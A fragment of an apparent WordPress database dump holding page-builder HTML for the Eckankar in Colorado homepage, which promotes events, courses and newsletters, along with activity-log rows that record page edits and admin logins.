col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 8px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241355,41022,'_server_remote_addr','76.130.120.x'),(241356,41022,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241357,41023,'post_id','7160'),(241358,41023,'post_type','page'),(241351,41022,'_message_key','post_updated'),(241352,41022,'_user_id','2'),(241353,41022,'_user_login','S8zhaBda'),(241354,41022,'_user_email','nada@zipnadanot.org'),(241389,41026,'_server_remote_addr','73.95.74.x'),(241390,41026,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241391,41027,'post_id','269365'),(241392,41027,'post_type','nf_sub'),(241393,41027,'post_title',''),(241394,41027,'_message_key','post_updated'),(241395,41027,'_server_remote_addr','73.95.74.x'),(241396,41027,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(241397,41028,'user_id','2'),(241398,41028,'user_email','nada@zipnadanot.org'),(241399,41028,'user_login','S8zhaBda'),(241400,41028,'_user_id','2'),(241401,41028,'_user_login','S8zhaBda'),(241402,41028,'_user_email','nada@zipnadanot.org'),(241403,41028,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(241404,41028,'_message_key','user_logged_in'),(241405,41028,'_server_remote_addr','76.130.120.x'),(241406,41028,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(241407,41029,'_user_id','2'),(241408,41029,'_user_login','S8zhaBda'),(241409,41029,'_user_email','nada@zipnadanot.org'),(241410,41029,'_message_key','user_logged_out'),(241411,41029,'_server_remote_addr','76.130.120.x'),(241412,41029,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(241375,41024,'_user_login','S8zhaBda'),(241376,41024,'_user_email','nada@zipnadanot.org'),(241377,41024,'_server_remote_addr','76.130.120.x'),(241378,41024,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241379,41025,'_user_id','2'),(241380,41025,'_user_login','S8zhaBda'),(241381,41025,'_user_email','nada@zipnadanot.org'),(241382,41025,'_message_key','user_logged_out'),(241383,41025,'_server_remote_addr','76.130.120.x'),(241384,41025,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=bg_block'),(241385,41026,'post_id','269364'),(241386,41026,'post_type','nf_sub'),(241387,41026,'post_title',''),(241388,41026,'_message_key','post_updated'),(241373,41024,'_message_key','post_updated'),(241374,41024,'_user_id','2'),(241372,41024,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div 